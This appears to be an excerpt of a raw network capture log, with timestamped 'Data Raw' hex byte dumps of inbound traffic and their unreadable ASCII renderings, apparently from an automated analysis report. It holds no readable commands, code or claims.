b0 52 32 d4 b0 29 3d bc 6d d5 39 9f 8d 42 76 e6 61 84 36 fe fd f8 f3 14 b3 8f 7f 72 59 46 b4 1c 4a a1 4e 3e 85 f7 2d b7 91 73 19 af b5 b4 86 a3 db 1d
                                                                                              Data Ascii: @:I.vYb/c<!p?HiR eO^}=qFo\/Xv'(WiJ'"k9k"vbIV`JTo>!}%XL5(c3uF]E,qo$OG!-OUkN9R|5R2)=m9Bva6rYFJN>-s
                                                                                              2021-12-13 23:57:11 UTC933INData Raw: 8c 3f 8f 2b d0 8a c5 f5 eb f0 6f d3 a1 b4 c8 c1 08 e0 cf 59 f8 3f 27 f8 ee 73 b8 92 bd b8 dc 91 51 3a 98 d2 43 8f 2a d7 d6 45 0e fe 04 31 f8 a9 8d 00 3f f0 6d 32 52 63 6f ef 7c 8d 0c 05 fd 1d 52 8f b1 17 89 06 6f 9f 1c c7 8d 69 bc 8c 7f 29 96 f5 eb 2a 31 63 68 9f 01 ad 65 b0 d6 32 f4 53 af d1 51 6c 18 b3 b1 ae 97 57 11 b1 8b 43 fb 2e 82 d8 45 26 76 d1 12 bb 68 fc 27 a1 c6 42 97 86 f6 5d 02 a1 4b 4c 08 12 f6 df 00 aa dd 0a aa 69 2f ed b8 bc 69 38 f6 a6 55 b1 bf 7d 81 54 ec 4d 5c b1 a7 bf 8f 0b 5b 38 1c 3b 63 e5 3d 03 79 67 70 9e 8a f3 76 e0 5a 54 62 d5 a1 7d 55 28 a3 ca ca a8 de 59 ac 46 0e 1d be 56 ab 41 31 ef e1 e6 d1 d6 c0 8f af b4 43 89 4b c9 c5 81 38 f8 b8 ce ea 2a fd 2c a8 fe ac b1 f6 45 87 7f be b4 a2 0b ee 83 23 d3 a5 f1 9b 67 a9 93 de ff 2c 35 e6
                                                                                              Data Ascii: ?+oY?'sQ:C*E1?m2Rco|Roi)*1che2SQlWC.E&vh'B]KLi/i8U}TM\[8;c=ygpvZTb}U(YFVA1CK8*,E#g,5
                                                                                              2021-12-13 23:57:11 UTC934INData Raw: 56 6d 53 42 6d 93 e5 96 20 48 39 d1 bf ec 53 34 96 c6 85 5e 46 1a 89 1d 62 92 4e 51 55 7d cc 66 b3 79 af fb 61 34 23 25 4a 37 53 a0 9b e8 8a 9f 97 15 45 f1 58 54 fc e0 6b 80 f6 fe 13 03 f4 23 8c 37 1d 8e 3e d0 ab 0b 22 7a 52 f8 cb 7a 0d d0 64 f9 92 85 31 ba b5 95 8f 25 77 6d d2 4f 28 ee d3 0b ee 24 ee fc d7 14 f1 92 9f 9f 06 1d 69 0c fd 27 9d 00 53 61 f1 bf e0 b6 86 d2 2d 60 51 38 59 87 90 d6 58 27 31 0d 54 8c bf cf 64 4d 3e 40 77 69 b5 21 d1 6a d2 61 c8 85 fd 8d 86 5c 2b a2 39 b0 9f e5 c0 d2 8f fd a2 6f ae 24 fc 4f a4 e6 aa 72 b9 e6 b3 a4 c8 05 a0 70 37 4c af 8a 4c 83 74 8b c0 0f 89 4a e6 ab 94 cf f0 0c e8 e8 0e bd 40 bb 71 12 f4 ea d0 83 3f a2 ca ab 25 0d f6 99 0e f2 cf 67 6a e7 8f 19 d2 3d e4 a9 41 a9 2f 60 7d 03 e2 98 0f ca b6 83 20 90 fb c7 a2 16 06
                                                                                              Data Ascii: VmSBm H9S4^FbNQU}fya4#%J7SEXTk#7>"zRzd1%wmO($i'Sa-`Q8YX'1TdM>@wi!ja\+9o$Orp7LLtJ@q?%gj=A/`}
                                                                                              2021-12-13 23:57:11 UTC950INData Raw: fc 15 0a da 80 31 9d 29 f0 3b c0 90 19 55 0e 3c 0a c4 09 b4 00 0f 00 f1 02 dd 40 11 90 20 e0 03 96 01 89 02 49 df 56 b0 00 48 12 28 02 ae 05 52 04 6a 81 78 20 55 60 33 30 1b 48 93 a9 ee 01 42 81 0c 29 61 fd 8e 82 83 1f 30 91 a5 44 12 e0 01 6c fa a9 11 78 0b c8 d6 8f 5e c0 cb 80 5d 3f 8a 02 cf 00 b9 52 a9 25 51 41 13 90 27 90 02 38 81 7c 81 02 e0 41 a0 40 3f 24 02 2b 81 42 5d 29 90 07 14 09 84 5f a9 e0 07 40 b1 7e 68 06 be 07 94 08 d4 02 73 01 87 7e d0 04 a2 80 32 9d d8 55 0a a6 01 e5 02 36 e0 73 0f 13 59 ea a8 00 3e 00 a2 64 09 6e 03 7a 80 18 81 3e e0 15 20 56 c0 7a 35 df ff 00 e2 04 6c c0 13 40 bc 40 09 50 0b 24 08 b4 02 0f 01 89 02 1e 60 15 90 24 10 93 c4 f7 3f 80 14 81 0c c0 06 a4 0a 14 02 d7 01 69 02 0d c0 65 40 86 40 07 10 0d 64 0a 0c 00 16 c0 26 10
                                                                                              Data Ascii: 1);U<@ IVH(Rjx U`30HB)a0Dlx^]?R%QA'8|A@?$+B])_@~hs~2U6sY>dnz> Vz5l@@P$`$?ie@@d&
                                                                                              2021-12-13 23:57:11 UTC951INData Raw: f3 44 ec 25 62 5a e5 b6 95 f6 3f 88 b8 07 a2 85 88 ff fe 1b 1a 61 40 0c 11 b1 44 c4 8c 6a c9 44 7c 42 c4 03 d5 3e 88 f8 13 22 1e 82 68 38 45 fb 1f 44 3c 02 d1 4d c4 34 11 b3 ca 07 11 bf 41 c4 06 04 b6 48 c4 2f 12 f1 58 f9 78 8b f6 3f 88 78 a2 7c 10 d1 4d c4 9c f2 41 c4 59 22 9e aa e6 40 c4 97 88 98 57 cd e1 6d da ff 20 e2 19 88 12 11 f5 44 2c a8 26 45 c4 16 22 2a 10 c7 0a 11 ff f3 8c c6 20 28 9a db 68 ff 83 88 45 ec 7c 17 89 78 46 c4 ac 7c 30 46 0f f9 45 a9 f6 07 b5 f4 c7 8f d2 a7 12 de a4 17 e1 aa 27 67 3f fd a1 43 b3 37 66 4b ef 1e 9a fd 1d 3a 74 1b c1 1c 60 5e 3d d8 24 4f 5f 23 4f 4f d4 63 5e 22 be 4a c4 53 f5 a4 93 88 21 22 e8 00 ec a7 6d da e8 43 a2 1e 1b 46 6d 44 cc 19 46 6f 10 31 8f e4 9e 00 9e 02 9e 41 55 f1 0e ad ff 49 b5 00 a2 85 08 41 c4 3d 6c
                                                                                              Data Ascii: D%bZ?a@DjD|B>"h8ED<M4AH/Xx?x|MAY"@Wm D,&E"* (hE|xF|0FE'g?C7fK:t`^=$O_#OOc^"JS!"mCFmDFo1AUIA=l
                                                                                              2021-12-13 23:57:11 UTC967INData Raw: c7 97 aa 85 e4 83 e0 7a 1f 44 bc 99 9c 93 4a 97 3a 17 ca 79 af 3d 3a c0 36 03 2c a4 a7 1b 52 d8 b3 00 a3 25 6f 7f ed 00 94 fc 4c 4b 6e c3 0d 42 eb 52 57 69 e9 c6 95 44 87 f8 a7 d1 d8 18 9d 78 27 50 2a c7 fb 04 2b 13 a0 31 dd 93 9d 6a 6e de 92 34 34 e1 50 f2 1b ac 5a 9a 65 a1 f8 f3 23 03 41 46 7d fa 65 17 a7 54 90 7a 05 c7 2d 42 6e bd c2 0f dc da 6d d8 e3 3a bb ed 14 9d 39 1a f8 a8 47 da 56 7d 96 db 82 3b 75 c4 75 3d 3d f2 26 a0 96 9d fb 45 00 a0 c8 c1 2f 6f fd 54 12 5f 85 c2 2d 61 df c1 c1 af 68 ad 97 bf 14 bd 02 fc cd c5 f4 fc 14 fb aa cf 6a 2e 31 c2 57 56 af a1 3a 0b 7a c9 05 9d 25 e8 93 48 87 e0 4c 24 da 24 c1 9a 44 ac 5a f1 2f 07 06 24 b3 13 3b c2 6a 34 6c af 41 6b 54 69 92 2a 8d 98 76 0c d2 7c 0f ae 42 ee 72 88 f5 7a 46 32 3c 27 c3 6f 4a e5 bc 0b 91
                                                                                              Data Ascii: zDJ:y=:6,R%oLKnBRWiDx'P*+1jn44PZe#AF}eTz-Bnm:9GV};uu==&E/oT_-ahj.1WV:z%HL$$DZ/$;j4lAkTi*v|BrzF2<'oJ
                                                                                              2021-12-13 23:57:11 UTC968INData Raw: f6 95 9b 36 70 42 76 bc 5b 4c 1b 0b ca 9f b6 df 67 65 00 8e f4 68 8e 6a 9a 05 fe 39 78 26 04 63 1a f4 73 34 b9 3a 81 3c 89 31 76 bd 40 d8 71 b9 04 81 c7 f5 d3 7a 97 b1 ce 99 e4 16 bf 02 b8 8b d8 ee 13 ca 4b c4 a5 ab 3d 0a b5 3f 94 88 b5 3f 84 1c 40 5b 00 ae 58 66 02 30 d5 74 b3 d1 7b 33 71 68 f9 33 37 7a 6e e2 cf dc e1 99 ca 9f b1 79 ae e3 cf cc f1 5c cd 9f 59 e2 b9 92 3f 73 bf c7 c4 9f 79 d0 63 a8 39 83 48 7b 94 f2 69 8d 0a bf b2 0d 87 a4 da 08 ec ea 16 1f c5 a3 50 b5 8d c8 a4 b8 07 8e 31 c0 7c dc 4b 78 4f 02 b1 c6 b3 8d 4a 6a 20 4b b5 5f 05 99 36 69 6f c4 bf 1e 4e e1 95 24 e4 15 4c 33 2d 20 2e 3d 74 4d 6a be b8 64 35 25 bf 90 9d 0a 9d 91 1b 6f de 94 52 91 85 27 1c bd 33 70 d7 89 33 af b4 2d cb 71 0e 6a c8 cd 9b a3 39 9c 8f db 47 b2 1c e2 db 3d a0 29 0f
                                                                                              Data Ascii: 6pBv[Lgehj9x&cs4:<1v@qzK=??@[Xf0t{3qh37zny\Y?syc9H{iP1|KxOJj K_6ioN$L3- .=tMjd5%oR'3p3-qj9G=)
                                                                                              2021-12-13 23:57:11 UTC984INData Raw: c8 e1 15 39 2c 5c 22 87 af c8 e1 39 39 cc 9b c3 c2 1f c9 e1 eb 72 f8 4f 39 9c 3a 97 85 1e 39 fc 95 1c f6 cb 61 5e 2e 0b 1b e4 b0 5d 0e e3 f3 58 b8 4c 0e 77 ca e1 9f e5 b0 4b 0e 63 ed 2c cc 90 c3 0d 72 78 50 0e cf c9 e1 f5 f3 58 38 47 0e b7 c9 e1 61 39 bc 7e 3e 0b e7 cf 67 ee 43 8d fc fe fb f9 c8 42 fd d2 e7 72 a8 e5 6e ff 17 79 f8 3b 5c ef d6 08 23 c0 19 8e 30 41 b9 83 4b da 16 41 0a c3 72 c5 c6 df cd c6 27 41 7e 50 73 33 b9 aa 0b 17 4c a1 9a 3b 36 28 27 6c d0 79 60 5b 24 4f 67 08 66 16 ca be 51 b6 8a 8a b5 15 4a 26 16 06 33 ed 1b 87 83 05 8d bd 12 67 17 0a c7 e2 20 46 9b 55 ec 29 66 e5 67 d4 5c a0 3c 77 c0 3e 72 f9 e9 dc 6f a1 bc 26 63 c5 0a 36 12 1d d6 3a 6a f7 54 5c 94 bb b8 dc 4b 47 21 e9 5c 23 94 d0 41 89 82 e2 35 f7 8f 44 94 89 ac 58 34 2d 86 a3 32
                                                                                              Data Ascii: 9,\"99rO9:9a^.]XLwKc,rxPX8Ga9~>gCBrny;\#0AKAr'A~Ps3L;6('ly`[$OgfQJ&3g FU)fg\<w>ro&c6:jT\KG!\#A5DX4-2
                                                                                              2021-12-13 23:57:11 UTC985INData Raw: 2c 02 89 ce 08 30 09 fc 5b 56 e0 e6 c6 de 1f 3e 7f 1e a9 b3 6f be 0c cd 0b b4 0f a7 f8 9e c9 0f 4c b7 3f 43 19 84 e3 2c 4e 37 17 fa af 4f 7e cf 91 43 b7 f3 db cf b7 b7 38 95 49 90 f2 90 49 82 7f 7b cb a7 72 89 df 8b 38 f1 d1 eb 0c 53 1e b4 cd 31 ff 51 d4 2c ce 8b 9e ce df 55 a8 4c 90 3c 93 7f e1 e9 7c ce e8 0a ef cf 54 37 7b 8f 97 e3 6f 73 5d 7a 7f a6 36 b0 f9 fc a5 0d 6e 3a 0b f2 33 17 9b a8 78 c3 c5 fa f5 b4 4b 99 cf 2f 8f 30 09 fe 6f 23 e2 0d 14 b1 08 d3 ff ee b0 ee bd 89 2b 6c 18 6e 48 7a 9d ee 48 99 a7 d3 46 06 ed d4 d2 02 66 a7 c2 b2 59 96 16 84 4e ff 53 1a c7 fc 47 9b 6e 74 5d ca 72 41 3b e0 37 66 7e 61 d6 4a 1a 0d 6e c0 b7 ab fd e6 42 b4 26 7a 84 3e 6c bf 85 2e a7 b8 b2 cc ba 76 05 a8 3a aa 03 c3 75 a9 2e 54 97 b2 a9 f1 f2 05 a0 0b 0b 2f 33 6e b4
                                                                                              Data Ascii: ,0[V>oL?C,N7O~C8II{r8S1Q,UL<|T7{os]z6n:3xK/0o#+lnHzHFfYNSGnt]rA;7f~aJnB&z>l.v:u.T/3n
                                                                                              2021-12-13 23:57:11 UTC1001INData Raw: b2 dd bf e2 33 12 f6 32 6c ec f2 6d 1b ab 3d e5 9b 8a 3c 1b b4 f7 aa 48 59 7a 98 91 a2 83 47 32 1f 8a 47 e7 4e 3b 92 31 64 24 73 b8 91 1e 20 47 1c e0 62 03 f1 14 62 a0 e1 08 21 46 c8 ce 41 26 29 cd 44 d7 dc df 8e 4b 48 c4 a0 ed 98 47 ae 7d d7 15 ed 46 94 ae d8 a2 85 e1 52 19 62 66 23 c0 c1 66 d6 dd f8 4b 9e bd ce 33 1c c8 4c 46 92 28 55 cd 71 f4 84 2c 3d 1b 3c 9a d7 61 6f a3 ca ba 2c 65 85 38 55 91 4c 91 65 cd 96 2a 43 fc 9f db 02 54 1d ca fa 01 92 b1 d3 8b d9 3b c9 8b 03 e1 9e 1d 8c e5 83 da e0 5f 66 ae 79 03 4e 23 42 0e 4d 0c b4 b1 e6 44 fe fb 88 5c fe 6f 13 91 51 c3 9f 9b 33 f6 28 cf ca 0d e4 ea 44 6e 5f 8c 64 96 26 6c f2 96 90 cf 20 87 73 75 a7 51 53 62 80 b6 31 98 a3 86 d5 f5 a1 89 ca f4 7a cb 90 cd 2d 89 da b9 16 1f ca 92 c1 e6 5a 31 31 90 9e af 4d
                                                                                              Data Ascii: 32lm=<HYzG2GN;1d$s Gbb!FA&)DKHG}FRbf#fK3LF(Uq,=<ao,e8ULe*CT;_fyN#BMD\oQ3(Dn_d&l suQSb1z-Z11M
                                                                                              2021-12-13 23:57:11 UTC1002INData Raw: 2e 16 02 02 f2 75 db e9 04 e4 4f 71 09 7a 01 f9 7a cd 06 0d c8 9f e5 12 82 03 f2 f5 fa b8 65 40 fe 03 2e 41 0d c8 e7 38 84 48 69 32 29 73 09 4a 40 7e 98 3a d3 48 8b 4b 08 09 c8 0f aa 74 37 39 ec 12 fc 01 f9 78 57 a7 d6 42 72 da 25 e8 05 e4 0f ce 92 05 e4 ba 4b d0 09 c8 1f bc 55 2e 21 25 42 98 80 fc 61 cb d2 22 32 a7 44 08 13 90 3f 38 18 d3 49 4e 89 a0 13 90 1f c2 89 d2 12 21 38 20 3f 84 7c 75 c1 75 f4 26 fd d0 80 fc 23 25 42 b8 80 7c 3d e0 c3 07 e4 9f d7 ef 28 9a 98 86 d1 11 03 32 34 20 df 2c 08 fa 01 f9 41 54 98 c7 1c e3 d0 fd 85 73 b3 c3 ed 2f a4 90 19 42 e8 f6 05 2e 2e 74 ba 5f 40 4c 79 82 26 20 7f 68 da 6f 27 53 f2 04 9d 80 fc 61 4d cb 18 ff 08 f5 a3 86 e8 2b e2 da 03 e7 a7 21 04 e1 af b9 8f ad 69 ea 79 76 84 67 ff c9 b3 8f 78 66 9c 23 84 0b c2 3f 9d
                                                                                              Data Ascii: .uOqzze@.A8Hi2)sJ@~:HKt79xWBr%KU.!%Ba"2D?8IN!8 ?|uu&#%B|=(24 ,ATs/B..t_@Ly& ho'SaM+!iyvgxf#?
                                                                                              2021-12-13 23:57:11 UTC1018INData Raw: fc 86 81 af e2 6f 18 f8 fa f4 1b 96 7e 47 71 47 5c 60 6e b6 e2 96 5d 60 20 ac f5 02 03 67 23 2e 32 f0 55 70 91 a5 ff 45 71 13 e8 c9 d8 76 79 38 89 56 84 73 04 1d b3 08 48 66 bb 14 a2 03 a6 90 b4 e2 2e 0e 80 84 e4 52 8c 5b a8 b1 d3 87 18 bb ff a4 93 2e 52 e3 84 b5 36 8e ce c7 08 f3 6d bb d4 a3 f9 86 f5 d9 5a ac 1c 87 a1 80 ef b6 f2 c7 88 af 8c 9e a0 cc 61 4b 86 6e 33 3e 49 a4 d7 7b 82 8e 61 d9 f3 e9 24 ef 1d 43 d9 2e 3d 20 86 9a 44 25 eb 81 30 ea 81 37 7b c0 a8 21 04 76 59 5a 74 10 1d ca 54 37 65 a8 8c 69 88 29 52 c0 10 63 6d 7c 3f 12 63 a1 2d ec 82 a5 63 c8 17 90 39 4e c9 8c 2d f6 52 e0 09 72 01 0a c4 2a 05 14 9e f5 51 98 18 91 3b 87 aa a4 de c0 a8 ed 52 24 18 8d 0a c3 a2 ba ee a1 e8 44 aa ff ba 81 e5 bd b0 3a 9d ea cb 48 8c 69 bb 74 7f 18 33 9b 8c ff 0d
                                                                                              Data Ascii: o~GqG\`n]` g#.2UpEqvy8VsHf.R[.R6mZaKn3>I{a$C.= D%07{!vYZtT7ei)Rcm|?c-c9N-Rr*Q;R$D:Hit3
                                                                                              2021-12-13 23:57:11 UTC1019INData Raw: dc 5b e1 f2 a5 f4 7d f7 c0 8e 02 7e 77 7a 2c 64 84 6a f0 d3 dc 05 39 f1 e8 49 87 d1 52 3e 6a 6a 71 be 90 bf 88 a6 5a 61 95 d4 0f 3d 34 2a 06 7d 08 65 16 ae 18 44 cb 82 07 f4 c1 4c 1c e8 17 22 be ef 2d f7 ad 7f b6 88 38 63 0e 7c 06 8e 74 7b 50 8b dc 40 46 b5 05 ed ce 2e f0 d7 7a b2 c9 61 70 3f f9 9e c5 cb e0 2e be 4f bb b3 fd 63 07 29 df c5 ec ce 67 3b 83 76 c7 f3 49 d0 ee b4 ef 01 db b1 37 68 77 e2 f7 32 bb e3 3d e8 08 9c 9b d6 1d 0a da 9d d3 bb 42 cf 4d 17 61 fe 7d 0e b2 bb ce 41 ea f7 3b 22 ce 4d 07 cf f4 d8 16 b1 2d 00 f6 2f 86 bd d7 3a 3a e4 f1 59 33 c3 67 ea c7 67 88 5b d9 2b e1 0c 9e 2a bb 7c f4 95 70 2b 13 ee 40 cd 31 50 d1 a2 40 36 7c 80 9b a6 3a 33 3d d9 99 9b 8b a7 ab e8 c4 4a a7 68 44 35 ed f0 cd f2 41 f4 3c 1d f9 91 95 2b 58 04 53 62 05 9e c0
                                                                                              Data Ascii: [}~wz,dj9IR>jjqZa=4*}eDL"-8c|t{P@F.zap?.Oc)g;vI7hw2=BMa}A;"M-/::Y3gg[+*|p+@1P@6|:3=JhD5A<+XSb
                                                                                              2021-12-13 23:57:11 UTC1035INData Raw: af e0 67 f0 99 cd 57 69 3e b3 cf 12 07 c3 8e 15 bd c8 5f 47 6e 55 55 3e db 0a b0 7e 09 1f 01 df c8 c2 3a fe 7a f1 f7 01 c7 d7 e4 b3 9e 89 99 ac 0f 9e 38 78 3a 2f cb 67 7b ae cc 67 16 78 5c f0 8c 87 67 19 3c e3 86 e5 33 07 3c 7b ae 82 3c ed f9 cc 3a 3c 9f 15 c3 b3 19 9e 95 d1 f9 6c fe a8 7c 16 7d 49 3e 6b 87 c7 32 1a e2 c2 b3 0e 9e 63 f0 8c 8f c9 67 65 f0 ac 83 e7 24 3c 09 97 42 5c 78 36 c0 73 04 9e 78 c8 73 1c 3c cb e0 59 7b 05 a4 7d 39 94 23 16 f2 01 b7 b7 46 2b 33 5a b1 fc 18 ef 7d 63 2c 22 7d 52 b9 7b 51 51 0d 8c ec bd 65 29 6c 2e 80 22 d3 67 54 16 eb 50 dc 8c 9b 8f d6 23 11 ea db 8f 63 21 2c ae 4a e8 f6 cd ae 12 ba 7d 09 6c 68 8e 88 96 5a 54 b5 b8 a8 ee 4e c6 ab f3 07 de c2 bd b2 ca 78 aa 01 f1 08 61 11 29 22 a2 50 e8 8b af 09 a6 d0 e7 17 2f 44 b6 59
                                                                                              Data Ascii: gWi>_GnUU>~:z8x:/g{gx\g<3<{<:<l|}I>k2cge$<B\x6sxs<Y{}9#F+3Z}c,"}R{QQe)l."gTP#c!,J}lhZTNxa)"P/DY
                                                                                              2021-12-13 23:57:11 UTC1036INData Raw: e8 25 16 7a c5 4d e1 58 1b 56 3c f0 6c 5b 15 a7 7d 80 08 20 82 e0 a1 85 48 0d 6a 81 8f 6f c2 44 ed 59 cf 89 03 f6 6b 89 df c5 36 35 d6 d3 22 40 0e 19 df 7a 29 12 6d 61 c5 2c 0f e3 37 00 39 43 99 7f 09 94 ce 9d 7f 53 c5 49 7b ee e2 3f 18 02 80 89 04 38 86 1c 23 fd 87 3e 8e 81 f9 27 d4 dd 0f 2f 30 13 b0 2b b9 d6 d2 a8 49 23 4a 1b fa 4c 9e 31 9a 7d 46 2b 4a c8 e4 98 5d 7c 28 a6 c5 ff 4a d6 f8 ba e6 e2 cc d7 cf 9f f2 fb da 02 61 f6 c8 30 89 78 b6 6f 1c c8 f3 fc f4 d7 c7 d1 40 0e 62 e0 5c 62 c0 a0 cd 11 43 36 28 9c d6 d2 36 47 bc 89 5e 1a ea c7 30 cf b5 15 56 4a 6f e3 10 32 99 33 8c 3e d6 0d 91 26 73 20 94 37 7f 8c e2 b1 2a cb 3b 1a 5a 63 a4 81 0b c2 23 16 ca 41 b6 65 e0 3d 8e de 2d 32 51 a0 ce 36 99 17 7c 99 3c 09 54 a3 e1 0d cb d7 30 4f ac 82 c8 79 5d 09 e0
                                                                                              Data Ascii: %zMXV<l[} HjoDYk65"@z)ma,79CSI{?8#>'/0+I#JL1}F+J]|(Ja0xo@b\bC6(6G^0VJo23>&s 7*;Zc#Ae=-2Q6|<T0Oy]
                                                                                              2021-12-13 23:57:11 UTC1052INData Raw: b2 fa a0 f3 a9 1e 33 1d 4b 93 86 ca 7a e8 4a b7 7e 8d 21 3f fe 79 97 da 55 f4 a2 b0 62 b5 56 f2 ff 09 87 bd f3 4e 8a d8 d8 dc bf 3d ab 35 77 90 b4 d0 cc 11 34 5e eb 95 7e 7c 7e 02 26 1b f9 a2 e1 84 f3 9f ce 0a 96 fe f2 3f 44 57 1b fa 02 b6 b2 e4 e7 64 c0 e2 10 f6 8a e9 93 90 ca f1 7b 26 9a 72 ce 84 71 6c 32 d4 4c 61 cb 5a 25 c3 02 bd 20 0f 4d c5 cb f7 b3 f4 8e 7d 44 d9 8f 71 23 67 62 5c d4 a9 c3 a3 89 59 96 99 50 4e 84 bf 93 dd ad 16 20 59 af 35 f8 a5 a0 2f 7f 0b 9a 44 de cf ae 9f c5 c4 d2 f7 0b 6d 19 ba a0 e3 9c 56 7a 3a 8c de a4 59 f2 b0 a3 e7 56 dd b3 fb 72 69 20 33 46 e9 f0 ce eb 6b ca ea 6b 9a 8c bd df e3 ea 56 d3 a5 97 7d 55 b3 e7 3d bd 46 fe 71 4e d0 fd 68 b3 a0 fb 73 cf 1f 37 9a e1 7d 5f 7a f7 85 0a ef 23 e4 2d 0f 61 1a f8 2b 69 0f e1 d9 d1 16 65
                                                                                              Data Ascii: 3KzJ~!?yUbVN=5w4^~|~&?DWd{&rql2LaZ% M}Dq#gb\YPN Y5/DmVz:YVri 3FkkV}U=FqNhs7}_z#-a+ie
                                                                                              2021-12-13 23:57:11 UTC1053INData Raw: f3 a6 15 23 b2 43 4f 4d cf 13 a6 66 b3 fa f8 39 c6 b4 4b 17 2d cc 37 2f c4 3c 30 87 e5 16 c5 63 85 d4 2e 4f fa 12 72 50 31 87 3b 33 92 76 43 0e 2a e6 70 27 e5 50 0d 39 34 aa 9e 28 c5 19 ed 1d 8f 97 ee 74 cf a4 db f2 8f 86 9e 9f e1 5d de 93 34 af e7 91 24 c5 d3 33 f6 d4 db 9f 85 9e c2 7c a3 b7 90 9d 7c 3b 5d e8 e8 75 9e c4 9b d9 96 87 35 dd 6f ea 1e 36 dd eb e9 a1 8b da cc 78 ad 0e 44 5d f1 1a 26 1b 63 db e6 3c 23 95 cd ed c2 16 96 d6 ae ff f9 a5 d6 ae 4d 93 ed c0 58 f6 f5 1f d7 9a 73 c4 b3 03 9b 13 e5 6a 87 dd af 4e 7b a8 bc bd 42 67 5e 71 5a 93 9c 16 5b d3 08 b2 6c 64 19 eb b4 e2 01 f6 69 64 3e c1 a2 58 d7 d2 8b 55 89 5e 8b 13 0f d9 62 4f 7c 82 e4 20 3c cc 6b e9 1a 00 8b 12 fd 38 de ef 35 cf ea 8d 7e 46 40 bc e6 c7 bb 76 61 c0 79 56 68 b9 b7 79 a8 d3 8a
                                                                                              Data Ascii: #COMf9K-7/<0c.OrP1;3vC*p'P94(t]4$3||;]u5o6xD]&c<#MXsjN{Bg^qZ[ldid>XU^bO| <k85~F@vayVhy
                                                                                              2021-12-13 23:57:11 UTC1069INData Raw: 44 d2 19 24 f5 ad 0f e4 80 54 67 12 4e 13 b4 b9 f5 64 67 93 d2 e1 ea f1 19 d5 b3 16 de 95 86 e7 e0 94 22 b1 2e 47 c6 c1 76 76 c5 97 17 3d f2 f0 ab ef 8c 78 a6 51 f4 cd 7d b2 ed 63 5b 8a c5 10 17 cb 3e b0 9e b0 bf b2 ad b3 a9 f6 1c 9b 70 27 e0 a5 cf 00 5e 5a 61 eb 21 65 e6 75 26 b4 5d 99 39 d9 78 30 c0 97 84 51 86 c1 59 f9 2b 76 55 4f 47 8d 25 ac 9f a4 77 76 ec 35 a4 68 fc 9b 4c 01 93 4f d3 d9 2b 2a 57 5d 6b 36 8d 03 95 c1 a0 21 cf 32 e9 72 52 a3 2c be e0 5d a9 65 d8 8a 26 a2 1a 01 f2 ad 6d 26 42 f9 1c 60 d8 23 b8 97 5b c0 e7 45 c6 b0 b0 8c 10 e3 63 bb 1c 60 66 5c 98 1e 81 e1 74 43 77 d4 40 a0 86 3c 2a 40 2f be 44 34 e8 65 97 8f b2 e4 e7 80 ec 26 99 8d 59 66 d8 3a 63 ee 66 99 a9 0c e5 bf 36 e7 8e c8 33 51 51 0e c5 59 0a b4 ec f9 a8 a8 56 a3 62 ec a6 a8 d8
                                                                                              Data Ascii: D$TgNdg".Gvv=xQ}c[>p'^Za!eu&]9x0QY+vUOG%wv5hLO+*W]k6!2rR,]e&m&B`#[Ec`f\tCw@<*@/D4e&Yf:cf63QQYVb
                                                                                              2021-12-13 23:57:11 UTC1070INData Raw: 4b 48 bf d4 6a 89 3e af 3d 4a f4 39 ad ff 25 09 b8 93 f4 ef b7 48 a0 da 16 06 d2 ad 91 cf ef 49 7a c5 56 8c f7 ac d6 b8 55 e6 23 e9 9e ad 0c a0 fb 2f f9 7c d5 36 a6 ed db 18 28 77 68 1b 03 e5 46 6f c7 e7 b9 62 fa 76 06 c8 3d b0 9d c3 75 6e c7 45 00 e4 23 69 9d 78 50 dc 2d ee 55 4b c5 08 df 5d e2 02 51 ee bb c0 77 93 b8 46 5c 2d 2a 61 6b 79 bb a8 16 05 c2 8f 1b 1c 5f c0 e7 f3 15 f8 14 df 48 df 44 60 26 d7 42 ec cb c5 8f c4 3f 89 d5 e2 c7 a2 d4 3f c2 7f b1 b8 44 5c 8a 76 80 c5 70 5f 89 ef fb e2 22 df c5 be 01 e5 46 f5 5a b5 40 2d 54 11 f8 36 5c 2d 51 bf a3 96 aa 65 ea 08 b5 4e bd 48 bd 42 bd 58 fd 96 3a 46 1d ab de a0 c6 d4 2b d5 71 ea 78 75 a2 2a 76 f8 76 28 3b 02 3b 0a 77 5c af 56 a9 d3 d4 b9 ea 48 75 b4 ff 3e 35 a8 56 aa b5 ea 54 f5 26 09 8e fb 4f 6d b7
                                                                                              Data Ascii: KHj>=J9%HIzVU#/|6(whFobv=unE#ixP-UK]QwF\-*aky_HD`&B??D\vp_"FZ@-T6\-QeNHBX:F+qxu*vv(;;w\VHu>5VT&Om
                                                                                              2021-12-13 23:57:11 UTC1086INData Raw: a2 f9 2e af 0c a7 1f 7a 02 17 64 c8 14 a1 d9 bf c7 5b 7c cf 1f f0 8a b9 b6 30 30 04 b1 98 9c 3c 98 e1 b9 1d d1 93 e7 4c a7 02 1e b6 9b 3e 0b a6 e7 08 6d ff 3f 65 1d 57 45 55 88 51 7a 43 fc f2 c2 08 ac 67 cd 1f 10 65 0f e9 ab 5f 42 8d 1d 99 2a f4 f4 9d 40 f2 07 bf c3 24 8d 7d a9 05 1b 49 76 66 e6 5c fd bd 88 f5 2d 38 b8 54 f2 3d d0 03 60 b3 af f4 5e 49 d1 6f 8e ff 2d de 24 5f 18 df 1d e0 f1 bd 59 23 a3 16 6b 49 d0 46 02 4a f6 4c b2 88 80 6d 73 8e 99 9b b5 35 10 fa 14 42 84 66 1d a6 f2 b1 e7 25 49 40 7d f1 7d ea 3c 62 35 1a ed b8 ea 76 ba 12 92 85 30 b3 09 90 db 1e a5 11 48 d8 d4 0d 70 d6 87 a1 7a 78 3d bf 1c 90 16 5d 49 b7 07 89 65 3a 62 16 a1 4a cd 02 4d a6 af 3d b3 d0 24 8f ce e3 f7 4f 3a ae 92 04 fd 01 28 c5 5b 01 0e 01 0e 38 4c 55 25 7a ab fb f0 7b 7b
                                                                                              Data Ascii: .zd[|00<L>m?eWEUQzCge_B*@$}Ivf\-8T=`^Io-$_Y#kIFJLms5Bf%I@}}<b5v0Hpzx=]Ie:bJM=$O:([8LU%z{{
